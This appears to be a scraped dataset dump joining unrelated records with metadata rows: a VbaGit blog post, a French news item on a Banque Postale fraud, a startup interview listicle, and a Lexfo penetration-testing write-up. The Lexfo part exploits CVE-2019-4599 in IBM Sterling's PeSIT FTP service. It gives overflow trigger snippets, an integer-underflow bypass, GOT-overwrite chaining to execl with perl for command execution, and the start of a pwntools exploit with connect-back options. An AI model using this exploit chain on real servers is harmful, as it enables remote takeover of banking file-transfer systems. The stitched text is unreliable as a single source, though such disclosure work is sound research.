After Getting your apps scripts to Github I thought I’d have a go at doing something similar for VBA. If you are reading this, you’ll know that it’s very difficult to manage shared code, since VBA is really a container bound thing. You can do things with add-ins and by referencing other sheets, but the VBA environment is very specific to your machine and your folder structure. Sharing common code across Spreadsheet containers or between machines is just a mess. I have tried a few things in the past (actually they will still work but I wont be loading the latest version of code there any longer), such as How to update modules automatically in VBA which uses GIST to publish code from the web, but getting it there and figuring out dependencies was fairly manual. VbaGit is about managing your VBA code and getting it in and out of workbooks. If you distribute or share code, or need version control then this is probably of interest to you.
There’s a lot of words here, so if you want to skip it and get started, go here – Getting started with VbaGit or VBA and jsdoc
#### What VbaGit does
In the end, quite a lot actually – it kind of grew as I was playing around with it and realized what could be done. I find the automatic documentation especially useful
-
- Given a module or set of modules or classes, figures out the dependencies amongst the other modules or classes in your workbook. In other words – which classes and modules are used by a module. This allows you to split up a workbook – let’s say to extract and share libraries from a bigger project, and creates an info.JSON describing your repo. Using this method you can create multiple repos from one workbook project, and each repo will only contain the code it needs to make its main modules/classes compile.
- Automatically creates documentation in markdown about the dependency cross references, and also creates documentation about each procedure in each module describing the arguments and their types. I did something like this before in Automatic documentation but this is much more detailed and useful.
- Figures out the Excel references used by the source workbook and includes it in the dependency documentation and info.JSON
- Puts all that in a staging area by project. One project = one GitHub repo. This repo contains all the documentation mentioned above, and all the code and libraries needed for the selected modules. This staging area can used by a normal git client, or by the one written in VBA I include with the package.
- Commits everything in the staging area to GitHub (creating or updating a GitHub repo as necessary), taking care of version control and only updating changes so on. Once committed to GitHub, you have a full revision history and copy of each commit stored.
- Pulls a repo from GitHub directly into a workbook, setting it up with all the code it needs to support the project.
#### What VbaGit doesn’t do
- No sheets, data or forms are managed. Neither are local scripts associated with particular sheets or in the ThisWorkBook Module. This is because different Workbooks are likely to have different worksheet structures or updated data. VbaGit is just for code in a) ClassModules and b) StandardModules. If you have other stuff, you can put it in the repository yourself
- Dependencies on modules containing only public constants will be missed, since it only knows how to find functions, subs and classes. If you put them in a module with procedure dependencies then they will be carried forward okay.
- The VBA git client only works on the master branch for now. If you want to fork and create other branches, you can still use VbaGit to manage the local repo, and a normal windows git client to do all the other stuff.
- No doubt there will be other stuff. If you find anything, please join our community and let me know.
#### What’s in the repo
For the discussion, I’ll use the repo for the VbaGit project itself, which of course I used VbaGit to create.
Here’s what this repo looks like when automatically created and committed. You can find the repo for VbaGit here.
Here’s what the project looks like in the VBA IDE
#### The readme file
This is committed if there isn’t one in the repo, otherwise it leaves it alone. The idea is that you use the initial skeleton to build on. If you want the skeleton re-instated, just delete your readme from the repo. It doesn’t say much and looks like this; it is created and committed to the GitHub staging area if there’s not already a README in the repository.
#### The dependency report
This describes what’s in the repo, a sample snip is shown below
Also in the dependency documentation you’ll see which Excel references were detected in the workbook being processed. VbaGit is unable to associate excel references with procedures and therefore know exactly which if these would be needed in a subset of the original workbook, so you can either choose to apply them manually in any workbook you create when importing from git, or have doImportGit do it automatically for you (in which case it will apply them all)
#### The cross reference document
This describes references between procedures, a sample snip is shown below
#### The info.json
This is used to create all the documentation above, and to control execution of VbaGit. Note that the info.json file will always be slightly newer than the one on github, since it records when it was committed after the commit completed. Take a look directly on github, it’s a little big to reproduce below.
#### The scripts folder
This is the source for all your scripts in your project and looks like this
It contains one file for each module, plus one document for each module. Here’s a snip of the documentation that was created automatically.
#### The libraries folder
If there are any, then all the libraries sources for each dependency needed by this project. Here’s a snip below. Each module or class has a code file as well as a documentation file the same as was shown in the scripts folder above
Each folder name matches a library, and contains the source for that library. Note that every library that is referenced for which sources are available are committed here – including libraries that are referenced by other libraries and so on. This list matched the dependency list in the dependencies.md report.
#### Technical writeup
You can find the repository for VbaGit here. Now to get started, go here – Getting started with VbaGit
Now take a look below for more on this subject
For help and more information join our community, follow the blog or follow me on Twitter . For how to do this for Google Apps Script, see Getting your apps scripts to Github | true | true | true | Page Content hide 1 VBAGit 2 What VbaGit does 3 What VbaGit doesn’t do 4 What’s in the repo 5 The readme file 6 The dependency report 7 The cross reference document 8 The info.json [...] | 2024-10-12 00:00:00 | 2019-03-26 00:00:00 | null | webpage | mcpher.com | Desktop liberation | null | null |
7,654,027 | http://pollenizer.com/know-getting-somewhere-startup | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,757,434 | http://www.wbur.org/edify/2017/07/11/masters-mit-poverty-lab | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,572,307 | https://translate.google.com/translate?sl=fr&tl=en&js=y&prev=_t&hl=fr&ie=UTF-8&u=http%3A%2F%2Fwww.francetvinfo.fr%2Ffaits-divers%2Fsept-personnes-liees-a-l-islam-radical-en-garde-a-vue-pour-escroquerie-a-la-banque-postale_737841.html&edit-text=&act=url | Banque Postale fraud: suspected radical Islamists among the eight people in police custody | Franceinfo | # Banque Postale fraud: suspected radical Islamists among the eight people in police custody
According to RTL, the perpetrators allegedly diverted 800,000 euros by exploiting a security flaw. Another suspect may currently be in Syria.
They allegedly took advantage of a security flaw to steal 800,000 euros from La Banque Postale. Eight people have been in police custody since Wednesday 5 November, in Toulouse (Haute-Garonne) and Angers (Maine-et-Loire), for "organized gang fraud". According to information from RTL, some of the suspects are believed to be linked to radical Islamism.
The arrests of these six men and two women took place in the Toulouse metropolitan area, in Angers, and also in Castres (Tarn). According to RTL, most of those arrested are the subject of a "state security" file established by the Direction générale de la sécurité intérieure (DGSI) because of their links with radical Islamism. Some live in Les Izards, the Toulouse neighbourhood that Mohammed Merah's family comes from. RTL reports that another suspect may even be in Syria at the moment. The Paris anti-terrorism unit has not, however, been put in charge of this case, which remains an ordinary criminal matter.
## A total loss of 25 million euros for the bank
The perpetrators allegedly exploited a flaw in the Certicode system, *"put in place by La Banque Postale to secure account-to-account transfers between clients"* of the institution, a police source told AFP. They reportedly managed to *"set up fraudulent transfers and siphon money from accounts without their holders' knowledge"*. This scam, which allegedly allowed the suspects to divert 800,000 euros, also benefited other fraudsters across France: in total, according to RTL, La Banque Postale may have lost up to 25 million euros before securing its system.
| true | true | true | According to RTL, the perpetrators allegedly diverted 800,000 euros by exploiting a security flaw. Another suspect may currently be in Syria. | 2024-10-12 00:00:00 | 2014-11-06 00:00:00 | article | francetvinfo.fr | Franceinfo | null | null |
|
7,644,591 | http://mashable.com/2014/03/20/want-to-work-for-a-startup-10-questions-to-ask-your-interviewer/ | Want to Work for a Startup? 10 Questions to Ask Your Interviewer | Scott Gerber | In startups especially, job interviews are just as much for the interviewee as they are for the interviewer. Because there is often a lot at stake for a new company, it's wise to ask where you will fit in among founders and first hires -- and how you can make a direct impact on the company's success.
That's why I asked 10 entrepreneurs from the Young Entrepreneur Council (YEC) what questions they would pose for an interviewer at a startup. Here's what they had to say:
1. What one thing must be done?
I would ask what one thing must be accomplished for the startup to succeed. There are two reasons to ask this: It will determine if they have a clear, focused vision, and it will give you a sense of how your job should be aligned with that goal.
2. When is your next funding round?
3. What's your runway?
4. How does your product apply to my role?
- Brett Farmiloe, Internet Marketing Company
5. What are your founders' goals?
- Bobby Grajewski, Edison Nation Medical
6. What's your exit strategy?
- Susan Strayer LaMotte, Exaqueo
7. What is the sales strategy?
8. What's the focus for the next three months?
9. What is the culture and work environment like?
10. What is the problem you're solving? | true | true | true | Want to Work for a Startup? 10 Questions to Ask Your Interviewer | 2024-10-12 00:00:00 | 2014-03-20 00:00:00 | article | mashable.com | Mashable | null | null |
|
22,693,952 | https://blog.lexfo.fr/pentesting-pesit-ftp.html | Lexfo's security blog | null | # Introduction
A classical penetration test requires skills to assess a large variety of weaknesses, often dealing with common bug classes. Memory corruptions are rarely exploited during penetration tests. The reasons being, they can be risky (you do not want to crash a production system) and it can be time consuming (if you develop/adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script because both vendors and users tend to take their patching very seriously. Nevertheless, these kinds of weaknesses may enable attackers to gather powerful primitives, such as Remote Command Execution or secrets theft.
Furthermore, when it comes to the banking world, it is common sense that this kind of issue shall provoke a mighty fuss, especially if no patch is ever available. Nonetheless, being able to detect memory corruptions during security assessments may avoid technical or economic disasters by just decommissioning the vulnerable service.
Finally, let's be honest: legacy software is almost never audited, since the major part is decommissioned whenever possible, and the remaining part is rarely tested. The reason is simple: this kind of software is often *very delicate* to patch, leading users to avoid spending time on repeated vulnerability assessments. Typically, the first audit will pinpoint the most evident weaknesses, while memory corruption bugs that do not lead to a crash will almost surely not be exploited, even when detected.
Consequently, I propose that you follow my analysis of **CVE-2019-4599**, a path I had to cross during a classical penetration test assessment. I was not expecting such a surprise at first :)
- The target
- Static analysis
- ALLO command handler
- Bypassing
`verif_num()`
- The Implementation
- Basic Test Cases
- Reconsidering the Test Cases
- Abusing Uninitialized Memory
- Dealing with Huge Overflow
- Leveraging Arbitrary write primitive
- Hunting the Arbitrary Execution Primitive
- Exploiting the bug
- Conclusion
- Demo
- Appendice
# The target
IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.
Of course, those files usage - as well as their content - can vary, yet they are all transferred using some exchange protocol in the end. While international standards recommend using SWIFT, French banks have been using a protocol named **PeSIT** since the 1980s.
Additionally, an FTP server is included in the **Connect:Express** software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.
Therefore, below are the main points of attacking the FTP server:
- When used by a bank, it is listening on the internet to communicate with other banking entities, although banks may typically position the service behind an IPSEC tunnel
- FTP protocol itself is one of the most known protocols, whose parts are described in several RFC
- More importantly, penetration test is more challenging with an exploit writing phase!
The second point is not really relevant, since the implementation does not seem to follow the part of the FTP specification that happens to be critical for the exploitation (RFC 959, pp. 30/31).
# Static analysis
Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or French/English mix. Looking at the `main()`
function, we can see that local arguments and flags are handled using `getopt()`
as shown in the following screenshot:
Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process gets `fork()`
'ed and `receive_commande()`
handles TCP payload sent by the client. That is, our main (remote) entry point:
`receive_commande()`
basically invokes two functions:
`TCP_RECV()`
: calls`recv()`
`analyse_commande()`
: dispatch the FTP command to the appropriate handler
Let's first analyze `TCP_RECV()`
. Here is a simplified version:
```
void* TCP_RECV(int mode)
{
int fd;
int cur;
if (mode == 2) {
// load "more data" (e.g. partial file upload)
cur = lit_parm->buf_lg;
fd = sock_dtp;
} else {
[0] cur = 0;
fd = sock_dcp; // incomming connection socket
}
[1] lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
if (lit_parm->buf_lg > 0) {
if (mode == 1) {
if (strf == 2) {
[2] lit_parm->buf_lg -= 2;
} else {
// ...
}
} else {
// ...
}
}
// ...
}
```
In other words, it fills the following **struct lit_parm_t** structure:
```
struct lit_parm_t {
char* buf; // pointer to user supplied data
int buf_lg; // length returned by recv() minus 2
// ...
int max_len; // max buffer length
}
```
In particular, `lit_parm->buf` holds everything read from the client with `recv()` in **[1]**, where `cur == 0` (**[0]**).
**One might notice a very "curious" operation in [2]**: yes, `lit_parm->buf_lg` is decremented by 2. Honestly, I don't know why this statement exists, but it actually leads to a bug (more on this later).
`lit_parm` itself is a **global** variable pointing to data allocated on the heap in **init()** (invoked at start up, before `fork()`):
```
void init()
{
// ...
input_net = malloc(130976);
// ...
lit_parm = calloc(1uLL, 32uLL);
lit_parm->buf = input_net;
lit_parm->buf_lg = 130976;
lit_parm->max_len = 130976;
// ...
}
```
In turn, `input_net` is also a global variable pointing to the heap. One might notice that "130976" looks like a *MAX_INPUT_SIZE* for the buffer.
Once the data has been received with `TCP_RECV()`, `receive_commande()` invokes `analyse_commande()`, which is the **main command dispatcher**. `analyse_commande()` distinguishes two sets of commands:
- pre-authentication: HELP, STAT, USER/PASS, ALLO
- post-authentication: all the other commands
From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands, or find a post-authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work", and having a **pre-auth bug is sexier**!
After a rough look at the different pre-auth commands, the focus has been set on the **ALLO** command.
# ALLO command handler
The **ALLO** command (for ALLOcate) is a command that can be called in **pre-authentication** mode. It is used to **allocate sufficient space** prior to a file upload. Typically, the next command would be STOR, for instance.
As the RFC959 stands, the expected grammar is:
```
ALLO <SP> <decimal-integer>
[<SP> R <SP> <decimal-integer>] <CRLF>
```
Once data has been received in `TCP_RECV()` (hence both `lit_parm->buf` and `lit_parm->buf_lg` have been filled), the **ALLO command handler** (invoked from `analyse_commande()`) **tries to** do the following:
- Find the length of <decimal-integer> (character-wise)
- If <decimal-integer> is actually a number, copy the user-provided data (i.e. <decimal-integer>) into the `rem_file` buffer
Let's check the implementation:
```
int i;
// find the number of characters of "<decimal-integer>" (stop at first space or ends of data)
[0] for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
[1] if (verif_num(i, (lit_parm->buf + 5))) {
if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1;
else
copy_len = i;
[2] memcpy(rem_file, (lit_parm->buf + 5), copy_len);
rem_file[copy_len] = 0;
// ...
```
In order to make things simpler, let's call the string located 5 bytes past `lit_parm->buf`: **PAYLOAD**.
So, the variable `i` is set to the length of **PAYLOAD** in **[0]**. Then, there is a check that **PAYLOAD** is only composed of digits with `verif_num()` in **[1]**. Finally, the buffer `rem_file` is filled with **PAYLOAD**, of size `copy_len`, in **[2]**.
One might immediately notice that there is no length check on the `memcpy()` in **[2]**: `rem_file` is filled with `copy_len` bytes of user-controlled data (*PAYLOAD*). The global variable `rem_file` itself is stored in the `.bss` as a 256-byte character array.
In other words, passing the following commands **leads to a buffer overflow in the .bss**:
```
ALLO 111...<252 times>...111111
^ start overflowing on the next variable in the .bss
```
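As a quick sanity check, a few lines of Python are enough to trigger this first, digits-only overflow (a rough sketch: the target address is a placeholder, and the port is the one the appendix exploit uses by default):
```
import socket

TARGET, PORT = "192.0.2.1", 5003        # placeholders: lab target and service port

s = socket.create_connection((TARGET, PORT))
s.recv(1024)                            # read the service banner
s.send(b"ALLO " + b"1" * 300)           # 300 digits: well past the 256-byte rem_file
s.close()
```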
At this point, the only "restriction" on **PAYLOAD**, is that it must only contain digits as enforced by `verif_num()`
. The latter returns true if **PAYLOAD** is only composed of digits OR if `i`
is zero.
This could look like the "big win" here yet "big win" does not equal "quick win" :-).
In fact, being restricted to "digit only" characters leads to harder exploitation. In the next section, we will show how to bypass this restriction and overflow the `rem_file`
buffer with almost arbitrary data.
# Bypassing `verif_num()`
In the previous section, we saw that we can trigger a buffer overflow on the `.bss`, but it came with a limitation: our **PAYLOAD** was restricted to digit characters.
## The Implementation
First, let's have a look at the `verif_num()` implementation:
```
bool verif_num(int ctr, char *test_char)
{
int i;
for (i = 0; i < ctr && isdigit(test_char[i]); ++i)
{
}
return i == ctr;
}
```
In order to pass the check, the string `test_char` must be composed of digit characters, up to `ctr` characters.
**Furthermore, if ctr is set to zero, verif_num() will always return true.**
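To convince ourselves of that last property, here is a rough Python port of the decompiled routine (a sketch for experimenting, not the vendor's code):
```
def verif_num(ctr, test_char):
    """Mimics the decompiled check: the first ctr characters must all be digits."""
    i = 0
    while i < ctr and test_char[i].isdigit():
        i += 1
    return i == ctr

print(verif_num(3, "123"))       # True
print(verif_num(3, "12a"))       # False
print(verif_num(0, "anything"))  # True: with ctr == 0 the loop never runs
```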
Back to the **ALLO** handler code, we saw that `verif_num()`'s `ctr` parameter receives the `i` variable computed here:
```
for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
```
and called here:
```
if (verif_num(i, (lit_parm->buf + 5))) {
...
}
```
## Basic Test Cases
Alright, let's analyze this part with some practical data. Here are our test cases:
```
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- |
| 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space |
| 1 | 'ALLO a' | 6 | 0 | false | n/a | |
| 2 | 'ALLO 1' | 7 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO a' | 7 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 6 | 1 | true | 1 | |
| 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after |
| 6 | 'ALLO 12' | 7 | 2 | true | 2 | |
```
As we can see in cases #0, #1, #4, #5 and #6, `verif_num()` behaves as expected and the `i` value is set correctly. In turn, `copy_len` equals `i`.
However, looking at cases #2 and #3, where two spaces are inserted after the **ALLO** command, we see that `i` is **always set to zero**, thus `verif_num()` also returns true!
That is, we reach the following code:
```
[0] if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1; // <---- unreachable code ?!
else
copy_len = i;
[1] memcpy(rem_file, lit_parm->buf + 5, copy_len);
```
Back to case #3, we see that our payload can be `ALLO<sp><sp>a` or `ALLO<sp><sp>aaaaaaa...` (two spaces). In other words, by using this "two spaces trick" we can put some **arbitrary data** in **PAYLOAD**.
Alas, in those cases `i` is also set to zero, that is, `copy_len` is set to zero! An overflow of 0 bytes can hardly be called an overflow!
Instead, looking back at line **[0]** in the previous snippet, it seems that this condition can **never be true**, as `lit_parm->buf_lg` has a minimum value of **5**... or... does it?
## Reconsidering the Test Cases
Remember `TCP_RECV()`, exposed earlier? Yes, there was a "curious line" after the call to `recv()`:
```
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
// ...
lit_parm->buf_lg -= 2; // <---- what the hell ?!
```
So yeah, our previous test cases are wrong, let's rewrite them!
Back to the computation of `i`, we see that if `lit_parm->buf_lg` is less than `5`, then `i` will always be set to zero (the `for` loop never iterates). Hence, `verif_num()` always returns true as well!
```
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- |
| 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space |
| 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | |
| 2 | 'ALLO 1' | 5 | 0 | true | 0xffffffff | two spaces before digit |
| 3 | 'ALLO a' | 5 | 0 | true | 0xffffffff | two spaces before char |
| 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | |
| 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after |
| 6 | 'ALLO 12' | 5 | 0 | true | 0 | |
```
In other words, if our **PAYLOAD** has a size of zero or one character (no matter what that character is), `copy_len` is set to **0xffffffff**.
This is an **INTEGER UNDERFLOW**, baby, and it leads to a huge `memcpy()` onto the `.bss`!
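To double-check the arithmetic, here is a small model of the handler's length computation (a sketch of the decompiled logic; the result is shown as an unsigned 32-bit value, as in the tables above):
```
def copy_len_for(data):
    buf_lg = len(data) - 2                 # TCP_RECV(): recv() length minus 2
    i = 0
    while buf_lg - 5 > i and data[5 + i] != ' ':
        i += 1
    copy_len = i - 1 if buf_lg - 5 < i else i
    return copy_len & 0xffffffff           # what memcpy() ends up seeing

print(hex(copy_len_for("ALLO 1")))         # buf_lg = 4  -> 0xffffffff
print(hex(copy_len_for("ALLO 12")))        # buf_lg = 5  -> 0x0
```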
We might benefit from it, yet it raises two issues:
- Overwriting 0xffffffff bytes starting from the `.bss` will certainly **crash** the process
- Can we actually control the data (i.e. the **PAYLOAD**), instead of being limited to zero or one byte?
# Abusing Uninitialized Memory
Back to the `memcpy()` called in the **ALLO** command handler: we saw that we can trigger a huge buffer overflow on `rem_file` (located in the `.bss` section). The code is:
```
memcpy(rem_file, lit_parm->buf + 5, copy_len);
```
As a reminder, `lit_parm->buf` is set, and only set, by `recv()`, that is, with user-controlled data:
```
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
```
One thing to note is that `lit_parm->buf` (initialized in `init()`, before the `fork()`) is **NEVER RESET** between `recv()` calls! Let's exploit this behavior to overflow the `rem_file` buffer with **arbitrary data**.
Basically, the exploitation strategy becomes (see the sketch below):
- send **<5 bytes><ARBITRARY_DATA>**: this sets the data in `lit_parm->buf`
- send **ALLO<space><0 or 1 arbitrary byte>**: this only overwrites the first 5 or 6 bytes of `lit_parm->buf` and leaves the rest of the buffer untouched
Of course, we can only control up to 130971 (130976 - 5) bytes of data, because of the `lit_parm->max_len` restriction.
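As a rough illustration of the strategy (placeholder target address, and the same service port as the appendix exploit):
```
import socket

TARGET, PORT = "192.0.2.1", 5003     # placeholders: lab target and service port

s = socket.create_connection((TARGET, PORT))
s.recv(1024)                         # service banner

# Step 1: poison lit_parm->buf; only its first 5 bytes get clobbered later.
s.send(b"XXXXX" + b"A" * 1024)       # arbitrary data that stays in the buffer
s.recv(1024)                         # read the reply to the bogus command

# Step 2: short ALLO -> buf_lg - 2 = 4 -> copy_len underflows to 0xffffffff.
s.send(b"ALLO 1")
```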
Looking at the memory layout of the process, such an overflow will overwrite **the whole .bss section** before hitting a NULL page and provoking a segfault!
That's one issue solved! There is one more, though: how do we deal with the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?
# Dealing with Huge Overflow
Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel emits a **SIGSEGV** signal to the process that is generally killed.
However, looking at the `init()`
function, we see that a lot of various signal handlers are set up:
```
puts("init: ***** signals caught");
signal(1, 1);
signal(2, sig_fin);
signal(3, sig_fin);
signal(4, sig_fin);
signal(5, 1);
signal(6, sig_fin);
signal(8, sig_fin);
signal(7, sig_fin);
signal(11, sig_fin); // SIGSEGV
signal(31, sig_fin);
signal(13, 1);
signal(14, 1);
signal(15, sig_fin);
signal(20, 1);
signal(17, sig_chld);
signal(21, 1);
signal(22, 1);
signal(29, 1);
signal(10, sig_usr1);
signal(12, sig_usr2);
```
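The decompiled output shows raw signal numbers (and a handler value of `1`, which corresponds to `SIG_IGN`); a quick Python loop on Linux decodes them:
```
import signal

for num in (1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 17, 20, 21, 22, 29, 31):
    print(num, signal.Signals(num).name)
# Among others: 11 -> SIGSEGV, 17 -> SIGCHLD, 10/12 -> SIGUSR1/SIGUSR2
```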
Therefore, the binary binds a signal handler for the **SIGSEGV** signal: `sig_fin()`. In other words, if our overflow provokes a SIGSEGV during the call to `memcpy()`, the execution flow is redirected to `sig_fin()`.
# Leveraging Arbitrary write primitive
As shown above, a signal handler is defined around several signals that are sent to the process upon received signals. Let us see what `sig_fin()`
, the handler function, does in this crude pseudo-code view:
```
*(trfpar + 235) = 8000;
if ( strf == 1 )
{
v3 = e_msg_gtrf;
*e_msg_gtrf->gap0 = "01";
v3->gap0[2] = '4';
}
else
{
e_msg_gtrf_ = e_msg_gtrf;
*e_msg_gtrf->gap0 = 14641;
e_msg_gtrf_->gap0[2] = 54;
}
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL); // <---- HERE
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
```
What we notice here is an explicit call to the GLIBC `memcpy()` function. Its source and destination parameters are global variables that we can overwrite with the huge buffer overflow: `e_msg_gtrf->log_buf` would ideally be clobbered to point to the desired write location, and `trfpar`'s new value should be a pointer to the source data to be copied.
As shown below, the variables we need to overwrite are located after `rem_file`, which is good news for us:
**We conclude it is possible to control the first two parameters of the memcpy() call!**
Here is a simplified schema of the `.bss` overwrite right before the segmentation fault, hence right before the call to `sig_fin()`:
# Hunting the Arbitrary Execution Primitive
Alright, so far we know that we have an arbitrary write of 1780 bytes, no less. How can we abuse it to take control of the execution flow? We saw earlier that the shutdown function `sig_fin()` was the key to exploiting the service. Nevertheless, it is worth mentioning one compelling requirement for a reliable and fast exploit: since there is only one chance to control the execution flow before the process ends, the written data must lead directly to command execution if at all possible.
Ideally, we would like to call a function like `system()`
with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, `system()`
is not imported by the binary.
Instead, looking at various imported symbols, we figured out that only `execl()`
was available. As a reminder, it has the following signature:
```
int execl(const char *path, const char *arg, ...);
```
More parameters have to be under our control: **four** of them, to spawn a remote shell... We will have to work around this issue. In the binary, `execl()` is only invoked in the `r_exit()` function, which is called by the "parent process" during program exit.
We have no choice but to find a way to have `execl()` called with controlled parameters.
# Exploiting the bug
One major pitfall of the write-what-where is its copy size (**0x6f4** = **1780** bytes), since it is a hardcoded value. Exploit writers may want to avoid unpleasant behaviors from the process by trying to overwrite only some of the last addresses in the `.got` section.
Fortunately for us - and since `fork()` is called upon every incoming connection - a crash will not disrupt the parent service, so we can let the process crash after we obtain the mighty shell.
Before exploiting for real, let's check the enabled protections for this binary:
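One way to reproduce that kind of check is pwntools' `checksec` summary (a sketch; the binary path is a placeholder for a local copy of the service):
```
from pwn import ELF

elf = ELF("./ftp_pesit")   # placeholder path to the Connect:Express FTP binary
print(elf.checksec())      # RELRO / stack canary / NX / PIE summary
```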
Full memory randomization (PIE) and read-only relocations (RELRO) are not enabled **at all**. As predicted, that makes the Global Offset Table an ideal victim for good old control-flow hijacking, and since the `.bss` section is mostly under our control, we may use it to store payloads. All we have to do is overwrite the `.got` entry of a GLIBC function that is called right after the arbitrary copy with a known and controlled location address. Easy peasy!
As said earlier, it is safer to overwrite as few entries as possible, to reduce the chances of the program crashing or behaving badly. Overwriting the last values facilitates this.
Maybe following the code of our good segfault handler function, and comparing it against the `.got` candidates, could help. What about `send_tomqueue()`, which is called right after the `memcpy()`?
```
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
```
`time()` appears to be a viable candidate, since it is among the first functions to run after `send_tomqueue()` is invoked by `sig_fin()`. It would allow a fast preemption of the execution flow. Unfortunately, `time()` does not take any parameters; using it directly may undermine the exploit's reliability.
However, we should keep in mind that most of the `.bss` is under our control, and that the software is a state machine that pushes and pulls data variables defined globally. The only requirement is to have controlled buffer pointers in the registers dedicated to function parameters (RDI, RSI, RDX, etc.).
After a quick review, one function looks rather handy and adequate: `TCP_SEND()`.
As shown above, `env_param` and `sock_dcp` are used here by `send()`, whose entry is among the last in the Global Offset Table. Luckily, `env_param` lies at `0x644778`, whereas `rem_file`, the buffer that we initially overflowed in the `.bss`, lies at `0x63AF60`. This means `env_param` can be overwritten 38936 bytes past the beginning of our buffer.
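A quick check of the distance (addresses taken from this writeup; the layout is obviously specific to this binary version):
```
rem_file  = 0x63AF60   # start of the buffer we overflow in the .bss
env_param = 0x644778   # pointer later handed to send()

print(env_param - rem_file)        # 38936
print(hex(env_param - rem_file))   # 0x9818
```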
Also, to avoid losing the flow or suffering unexpected crashes, we need to neutralize the `.got` entries placed after `send()` by pointing them at a `ret` assembly instruction. This way, any unexpected call to those imported functions will do nothing and return to our normal flow.
To sum it up: `time@.got` should be clobbered to point to `TCP_SEND()`, which calls `send(controlled_param1, controlled_param2, controlled_param3)`, and `send@.got` should be rewritten so that calling `send()` instead results in calling `execl@.plt` (`execl()` is imported from GLIBC because of a program function called `r_exit()`).
The final call should be as such:
```
execl("/bin/sh", "/bin/sh" "-c", "echo win")
^- path ^- argv[0] ^- argv[1] ^- argv[2]
```
**Hang on, chingón...**
Only three parameters are controlled when issuing a call to `send()`. Still, there is no real need to look for another function call giving total control over the parameters in order to obtain command execution. Indeed, this constraint comes from the shell, which needs the command text as a separate argument... whereas other language interpreters don't.
Thus, using `python -c` or `perl -e` with the code passed in a single argument should work, since `execl()` does not use a shell to spawn executable files.
The command execution could then be achieved by using:
```
execl("/usr/bin/perl", "/usr/bin/perl", "-e[CMD]")
```
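To convince yourself that the interpreter really accepts the code glued to the flag as a single argv entry (the same trick the exploit's `-eeval{...}` string relies on), a quick local test could look like this, assuming `/usr/bin/perl` is present:
```
import subprocess

# The Perl code rides along inside the "-e" argument itself: no extra argument needed.
subprocess.call(["/usr/bin/perl", "-eprint qq(three args are enough\\n)"])
```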
# Conclusion
Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug to leak memory addresses, or to poison the `.bss` section much more delicately, and it would have required another technique to achieve code execution since the Global Offset Table would be read-only.
For instance, since new client sessions are `fork()`'ed into processes whose memory segments sit at the same addresses as the parent's, one could recover the base address by attempting writes at many places and tracking crashes. Once the randomization is defeated, several techniques - such as overwriting `__exit_funcs` - lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as a stack pivot + ROP, would be required.
A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Also, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time constraints.
Note: a patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)
# Demo
# Appendix
Exploit code using python2 pwntools (sorry!)
```
#!/usr/bin/env python2
# IBM Sterling CX FTP Service
# Version: v1.5.0.12
# cve: CVE-2019-4599
#
# Proof-of-Concept state
# python ftp_pesit_exploit.py -r <target_ip> -p <PORT> -l <listener_ip>
import sys, time
from optparse import OptionParser
from pwn import options, remote, listen, randoms, log, p64
parser = OptionParser()
parser.add_option("-l", "--local-addr", dest="localip",
help="Local address for connect back", metavar="LOCALADDR",
default="127.0.0.1")
parser.add_option("-Y", "--local-port", dest="localport",
help="Local port for connect back", metavar="LOCALPORT",
default="4444")
parser.add_option("-r", "--remote-addr", dest="remoteip",
help="Remote target address", metavar="REMOTEADDR",
default=None)
parser.add_option("-p", "--remote-port", dest="remoteport",
help="Remote target port", metavar="REMOTEPORT",
default=5003)
(options, args) = parser.parse_args()
if __name__ == '__main__':
if (options.remoteip is None):
log.failure("Please specify a target address and port.")
sys.exit(1)
lport = options.localport
raddr = options.remoteip
lip = options.localip
